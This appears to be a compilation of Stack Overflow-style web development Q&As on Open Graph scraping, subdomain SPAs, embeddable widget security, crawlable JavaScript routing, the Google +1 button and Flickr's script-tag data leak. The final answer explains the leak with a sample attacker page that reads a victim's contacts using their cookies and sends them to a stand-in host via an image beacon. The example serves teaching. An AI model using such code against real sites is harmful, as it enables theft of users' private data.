Have facebook scrape a different URL than what was shared - javascript

I have a Single Page Application built in Ember.js, hosted on AWS S3. I'm trying to come up with a solution so that when someone shares a URL from our site to Facebook, Facebook can properly scrape the content on that page.
Obviously this won't work at this time because Facebook does not index JavaScript the way the Google search engine does. One solution I've seen is to use an Apache .htaccess file to redirect requests from Facebook to a server-side script that builds a barebones HTML page with the necessary Open Graph tags, as described in this post:
https://rck.ms/angular-handlebars-open-graph-facebook-share/
However, since we're on S3, I can't use an Apache .htaccess file, and from what I've been able to gather from the sparse docs on how S3 redirect rules work and what they can do, I'm not sure there is a way to accomplish this with that method.
So my question is: do Facebook, Open Graph, or even plain meta tags have a way of letting users share a URL, having Facebook follow a link to a server-generated file for its scrape data, and then, if someone clicks the shared link, actually pointing the user to the real single page application page instead of the server file Facebook used for the scrape?

Facebook supports “pointers” to request the metadata from a different URL – but that likely won’t help you here, because the reference to the URL that serves the metadata would again have to be part of the HTML code of the original URL that you want to share.
You might do better the other way around: let your users share the URL of your server-generated document that contains the correct metadata, and redirect human visitors who follow that link to the real target URL within your application. You can do that either via JS (location.href='…') or server-side (but in that case you need to implement an exception from that redirect for the FB scraper; it can be recognized by its User Agent, see https://developers.facebook.com/docs/plugins/faqs#scraperinfo).
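For the server-side variant, here is a minimal sketch (Node/Express; the route, the renderOpenGraphPage helper, and the target URL are illustrative assumptions, not part of the question's stack):

```javascript
// Sketch: serve a barebones Open Graph page to Facebook's scraper,
// redirect human visitors to the real SPA route. renderOpenGraphPage
// is a hypothetical helper that emits HTML with the og: meta tags.
const express = require('express');
const app = express();

app.get('/share/:id', (req, res) => {
  const ua = req.get('User-Agent') || '';
  // Facebook's scraper identifies itself as facebookexternalhit or Facebot
  if (/facebookexternalhit|Facebot/i.test(ua)) {
    res.send(renderOpenGraphPage(req.params.id));
  } else {
    // Humans never see this page; send them to the real application URL
    res.redirect('https://app.example.com/#/items/' + req.params.id);
  }
});

app.listen(3000);
```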

Related

Angular app spanning subdomains

So I am building an Angular app that allows people to create books and share them (digital books, mind you) via a subdomain link.
So something like mycoolbook.theappsite.com would be a sharable link.
I (perhaps stupidly) built the routes so that editing books happens at the URL "mycoolbook.theappsite.com/settings".
This being an Angular app, I am having to do hard redirects between those pages and so miss out on much of the SPA-y goodness. Is there a way to keep the app instance running between those pages?
If not I might move all the admin pages back behind the url like "theappsite.com/book/mycoolbook/settings" instead.
Is this at all possible?
I've already done all the hard work of getting sessions and ajax request working across the domains, it's just the state linking that becomes bothersome.
Short answer: no. You cannot move between book.domain.com and domain.com and have the URL change to reflect it, because Angular only manipulates part of the URL: the fragment section in hash mode, or the path, search string, and hash in HTML5 mode. It cannot touch the other parts of the URL, such as the host. If your application uses HTML5 mode, your server must be able to map URLs properly so they return the correct page (i.e. index.html) as you change the URL; that would mean both DNS locations would have to send back the same page.
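A minimal sketch of that server-side mapping (Node/Express here purely for illustration; any server that can rewrite to index.html works):

```javascript
// Sketch: serve static assets normally, and fall back to index.html
// for every other path so Angular's HTML5-mode router can take over.
// Both domains would need to point at a server doing this.
const express = require('express');
const path = require('path');
const app = express();

app.use(express.static(path.join(__dirname, 'public')));
app.get('*', (req, res) => {
  res.sendFile(path.join(__dirname, 'public', 'index.html'));
});

app.listen(3000);
```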
Now, you can send AJAX requests between the two domains, provided you understand how to deal with cross-domain issues (JSONP, CORS, etc.).
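On the AJAX side, a hedged CORS sketch, attached to an Express app like the one above (the origin whitelist is illustrative):

```javascript
// Sketch: allow the SPA on one subdomain to make credentialed
// (cookie-carrying) AJAX calls to this server.
const ALLOWED_ORIGINS = ['https://mycoolbook.theappsite.com'];

app.use((req, res, next) => {
  const origin = req.get('Origin');
  if (ALLOWED_ORIGINS.includes(origin)) {
    res.set('Access-Control-Allow-Origin', origin);
    // Required for the browser to send/accept cookies cross-origin;
    // the wildcard "*" origin is not allowed in that case.
    res.set('Access-Control-Allow-Credentials', 'true');
  }
  next();
});
```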

Security in embedded iframe/javascript widget

I'm building a website that is functionally similar to Google Analytics. I'm not doing analytics, but I am trying to provide either a single line of javascript or a single line iframe that will add functionality to other websites.
Specifically, the embedded content will be a button that will popup a new window and allow the user to perform some actions. Eventually the user will finish and the window will close, at which point the button will update to a new element reflecting that the user completed the flow.
The popup window will load content from my site, but my question pertains to the embedded line of JavaScript (or the iframe). What's the best-practice way of doing this? Google Analytics and Optimizely use JavaScript to modify the host page. Obviously an iframe would work too.
The security concern I have is that someone will copy the embed code from one site and put it on another. Each page/site combination that implements my script/iframe is going to have a unique ID that the site's developers will generate from an authenticated account on my site. I then supply them with the appropriate embed code.
My first thought was to just use an iframe that loads a page off my site with url parameters specific to the page/site combo. If I go that route, is there a way to determine that the page is only loaded from an iframe embedded on a particular domain or url prefix? Could something similar be accomplished with javascript?
I read this post which was very helpful, but my use case is a bit different since I'm actually going to pop up content for users to interact with. The concern is that an enemy of the site hosting my embed will deceptively lure their own users to use the widget. These users will believe they are interacting with my site on behalf of the enemy site but actually be interacting on behalf of the friendly site.
If you want to keep it as a simple, client-side only widget, the simple answer is you can't do it exactly like you describe.
The two solutions that come to mind for this are as follows, the first being a compromise but simple and the second being a bit more involved (for both you and users of your widget).
Referer Check
You could validate the Referer HTTP header to check that the domain matches the one expected for the particular site ID. Keep in mind, though, that not all browsers will send it (and most will not if the referring page is HTTPS), and some browser privacy plugins can be configured to withhold it, in which case your widget would not work, or you would need an extra, clunky step in the user experience.
Website www.foo.com embeds your widget using say an embedded script <script src="//example.com/widget.js?siteId=1234&pageId=456"></script>
Your widget uses server side code to generate the .js file dynamically (e.g. the request for the .js file could follow a rewrite rule on your server to map to a PHP / ASPX).
The server side code checks the Referer HTTP header to see if it matches the expected value in your database (see the sketch after these steps).
On match the widget runs as normal.
On mismatch, or if the referer is blank/missing, the widget will still run, but there will be an extra step that asks the user to confirm that they have accessed the widget from www.foo.com
In order for the confirmation to be safe from clickjacking, you must open the confirmation step in a popup window.
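A minimal sketch of that referer check (Node/Express; widgetSites stands in for the database, and the two render helpers are hypothetical):

```javascript
// Referer-check sketch. widgetSites maps site IDs to expected hosts.
const express = require('express');
const app = express();
const widgetSites = { '1234': 'www.foo.com' };

app.get('/widget.js', (req, res) => {
  const expected = widgetSites[req.query.siteId];
  const referer = req.get('Referer') || '';
  let refererHost = '';
  try { refererHost = new URL(referer).hostname; } catch (e) { /* blank/invalid */ }

  res.type('application/javascript');
  if (expected && refererHost === expected) {
    res.send(renderWidgetJs(req.query.siteId)); // hypothetical: normal widget
  } else {
    // Blank or mismatched referer: still serve the widget, but have it
    // ask the user (in a popup, to avoid clickjacking) to confirm the
    // host site before proceeding.
    res.send(renderConfirmFirstWidgetJs(req.query.siteId)); // hypothetical
  }
});
```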
Server Check
This could be a bit over-engineered for your purposes and runs the risk of becoming too complicated for clients who wish to embed your widget; you decide.
Website www.foo.com wants to embed your widget for the current page request it is receiving from a user.
The www.foo.com server makes an API request (passing a secret key) to an API you host, requesting a one time key for Page ID 456.
Your API validates the secret key, generates a secure one time key and passes back a value whilst recording the request in the database.
www.foo.com embeds the script as follows <script src="//example.com/widget.js?siteId=1234&oneTimeKey=231231232132197"></script>
Your widget uses server side code to generate the js file dynamically (e.g. the .js could follow a rewrite rule on your server to map to a PHP / ASPX).
The server side code checks the oneTimeKey and siteId combination to check it is valid, and if so generates the widget code and deletes the database record.
If the user reloads the page, the above steps are repeated and a new one-time key is generated. This guards against evil.com scraping the embed code and parameters off the page; a sketch of this exchange follows.
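A hedged sketch of the one-time-key exchange, on the same Express app as the referer sketch (the secret lookup and widget renderer are hypothetical helpers; a real implementation would persist keys with an expiry instead of an in-memory Map):

```javascript
const crypto = require('crypto');
const oneTimeKeys = new Map(); // key -> siteId

// Server-to-server call from www.foo.com, authenticated by a shared secret.
app.post('/api/one-time-key', (req, res) => {
  if (req.get('X-Api-Secret') !== lookupSecretForSite(req.query.siteId)) { // hypothetical lookup
    return res.sendStatus(403);
  }
  const key = crypto.randomBytes(16).toString('hex');
  oneTimeKeys.set(key, req.query.siteId);
  res.json({ oneTimeKey: key });
});

// Requested by the visitor's browser via the embedded <script> tag.
app.get('/widget.js', (req, res) => {
  const siteId = oneTimeKeys.get(req.query.oneTimeKey);
  res.type('application/javascript');
  if (siteId && siteId === req.query.siteId) {
    oneTimeKeys.delete(req.query.oneTimeKey); // single use
    res.send(renderWidgetJs(siteId)); // hypothetical renderer
  } else {
    res.send('// invalid or reused one-time key');
  }
});
```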
The response here is very thorough and provides lots of great information and ideas. I solved this problem by validating X-Frame-Options headers on the server side, though browser support for those is incomplete and they are possibly spoofable.

How can I make an indexable website that uses a JavaScript router?

I have been working on a project that uses the Backbone.js router, and all data is loaded by JavaScript via RESTful requests. I know there is no way to detect server-side whether JavaScript is enabled, but here are the scenarios I have thought of to make this website indexable:
I can append a query string to each link in sitemap.xml and put a <script> tag on the page to detect whether JavaScript is enabled. The server renders this page with indexable data, and when a real user visits it I can manually initialize the Backbone.js router. The problems: I need to execute an extra SQL query to render the indexable data server-side, which causes extra load when the visitor is not a bot; when users share one of the site's URLs somewhere, it won't be the indexable variant, so web crawlers may not identify the content of that URL; and the extra string in the crawler's search results may be annoying for users.
I can detect popular web crawlers like Google, Yahoo, Bing, and Facebook server-side from their user agents, but I suspect there will be some web crawlers that I miss.
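For reference, a minimal sketch of that user-agent check (the pattern list is illustrative and, as noted, can never be exhaustive):

```javascript
// Crude crawler detection by User-Agent; inevitably incomplete,
// which is exactly the weakness pointed out above.
const BOT_PATTERN = /googlebot|bingbot|yahoo|slurp|facebookexternalhit/i;

function isKnownCrawler(userAgent) {
  return BOT_PATTERN.test(userAgent || '');
}
```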
Which way seems more convenient, or do you have any other ideas or experience with making this kind of website indexable?
As elias94xx suggested in his comment, one solid solution to this dilemma is to take advantage of Google's "AJAX crawling". In short, Google told the web community: "look, we're not going to actually render your JS code for you, but if you want to render it server-side for us, we'll do our best to make it easy on you." They do that with two basic concepts: pretty URL => ugly URL translation, and HTML snapshots.
1) Google implemented a syntax web developers could use to specify client-side URLs that could still be crawled. The syntax for these "pretty URLs", as Google calls them, is: www.example.com?myquery#!key1=value1&key2=value2.
When you use a URL with that format, Google won't try to crawl that exact URL. Instead, it will crawl the "ugly URL" equivalent: www.example.com?myquery&_escaped_fragment_=key1=value1%26key2=value2. Since that URL has a ? instead of a #, it will of course result in a call to your server. Your server can then use the "HTML snapshot" technique.
2) The basic idea of that technique is that you have your web server run a headless JS runner. When Google requests an "ugly URL" from your server, the server loads your Backbone router code in the headless runner, which generates (and then returns to Google) the same HTML that the code would have generated had it run client-side.
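A minimal sketch of the ugly-URL handling (Express, boilerplate omitted; renderSnapshot is a hypothetical stand-in for whatever headless runner you use):

```javascript
// Sketch: translate Google's "_escaped_fragment_" requests back into
// the client-side route and answer with a prerendered HTML snapshot.
app.get('*', (req, res, next) => {
  const fragment = req.query._escaped_fragment_;
  if (fragment === undefined) return next(); // normal visitor: serve the SPA

  // Reconstruct the "pretty URL" the crawler is asking about
  // (simplified: other query parameters are ignored here).
  const prettyUrl = req.path + '#!' + decodeURIComponent(fragment);

  // Hypothetical: run the Backbone app in a headless JS runner and
  // resolve with the HTML it produces.
  renderSnapshot(prettyUrl)
    .then(html => res.send(html))
    .catch(next);
});
```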
A full explanation of pretty=>ugly URLs can be found here:
https://developers.google.com/webmasters/ajax-crawling/docs/specification
A full explanation of HTML snapshots can be found here:
https://developers.google.com/webmasters/ajax-crawling/docs/html-snapshot
Oh, and while everything so far has been based on Google, Bing/Yahoo also adopted this syntax, as indicated by Squidoo here:
http://www.squidoo.com/ajax-crawling

Can the Google +1 Javascript API be used in a way that requests are sent via visitor's PC/IP, and not my web server?

Google +1 API reference: http://code.google.com/apis/+1button/
What I want to do is use the Google+1 API on my website that contains pages with links to other websites. When a visitor clicks the +1 button next to a link they like, I want the request to come from the user's computer, not from my web server.
My concern is that Google may think the +1s are spammy or whatnot if they all come from my web server, so I want them to appear natural, coming from IPs all over the world.
Hoping that someone who REALLY understands HTTP requests and Javascript can help answer this.
Thanks in advance!
EDIT:
Turns out the JSON request that's sent when the +1 button is clicked contains a field called "container" holding the source page URL, not the URL that's actually being +1'd. Also, when the .js files are fetched via GET to a visitor's machine, the Referer header is (of course) set to the source page URL.
I'm looking for a way to prevent the Referer header and the "container" field from containing the source page URL.
A Google +1 link in a web page already comes from the user's computer. The user displays your web page in their browser, and when a +1 button is clicked, the user's own browser makes the +1 request to Google's servers. Your site only provides the code in the page; the user's computer makes the actual request. I don't think you need to worry about this issue, as your web server is not making the Google +1 request.

Security issue with dynamic script tags

This Flickr blog post discusses the thought behind their latest improvements to the people-selector autocomplete.
One problem they had to overcome was how to parse and otherwise handle so much data (i.e., all your contacts) client-side. They tried getting XML and JSON via AJAX, but found it too slow. They then had this to say about loading the data via a dynamically generated script tag (with callback function):
JSON and Dynamic Script Tags: Fast but Insecure
Working with the theory that large string manipulation was the problem with the last approach, we switched from using Ajax to instead fetching the data using a dynamically generated script tag. This means that the contact data was never treated as a string, and was instead executed as soon as it was downloaded, just like any other JavaScript file. The difference in performance was shocking: 89ms to parse 10,000 contacts (a reduction of 3 orders of magnitude), while the smallest case of 172 contacts only took 6ms. The parse time per contact actually decreased the larger the list became. This approach looked perfect, except for one thing: in order for this JSON to be executed, we had to wrap it in a callback method. Since it’s executable code, any website in the world could use the same approach to download a Flickr member’s contact list. This was a deal breaker. (emphasis mine)
Could someone please go into the exact security risk here (perhaps with a sample exploit)? How is loading a given file via the "src" attribute in a script tag different from loading that file via an AJAX call?
This is a good question, and this exact sort of exploit was once used to steal contact lists from Gmail.
Whenever a browser fetches data from a domain, it sends across any cookie data that the site has set. This cookie data can then be used to authenticate the user and fetch any user-specific data.
For example, when you load a new stackoverflow.com page, your browser sends your cookie data to stackoverflow.com. Stackoverflow uses that data to determine who you are, and shows the appropriate data for you.
The same is true for anything else that you load from a domain, including CSS and Javascript files.
The security vulnerability that Flickr faced was that any website could embed this javascript file hosted on Flickr's servers. Your Flickr cookie data would then be sent over as part of the request (since the javascript was hosted on flickr.com), and Flickr would generate a javascript document containing the sensitive data. The malicious site would then be able to get access to the data that was loaded.
Here is the exploit that was used to steal google contacts, which may make it more clear than my explanation above:
http://blogs.zdnet.com/Google/?p=434
If I was to put an HTML page on my website like this:
<script src="http://www.flickr.com/contacts.js"></script>
<script> // send the contact data to my server with AJAX </script>
Assuming contacts.js uses the session to know which contacts to send, I would now have a copy of your contacts.
However if the contacts are sent via JSON, I can't request them from my HTML page, because it would be a cross-domain AJAX request, which isn't allowed. I can't request the page from my server either, because I wouldn't have your session ID.
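To make that concrete, here is a hedged sketch of the attack page, assuming (hypothetically) that contacts.js wraps the data in a callback named handleContacts; the attacker's collection URL is likewise made up:

```html
<!-- Attacker's page. "handleContacts" and the collection URL are
     hypothetical; the real callback is whatever contacts.js invokes. -->
<script>
  function handleContacts(contacts) {
    // The victim's Flickr cookies authenticated the script request,
    // so "contacts" is their private data. An image beacon ships it
    // out without needing a (forbidden) cross-domain AJAX call.
    new Image().src = 'http://evil.example/steal?data=' +
      encodeURIComponent(JSON.stringify(contacts));
  }
</script>
<script src="http://www.flickr.com/contacts.js"></script>
```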
In plain English:
Unauthorised computer code (Javascript) running on people's computers is not allowed to get data from anywhere but the site on which it runs - browsers are obliged to enforce this rule.
There is no corresponding restriction on where code can be sourced from, so if you embed data in code, any website the user visits can employ the user's credentials to obtain the user's data.
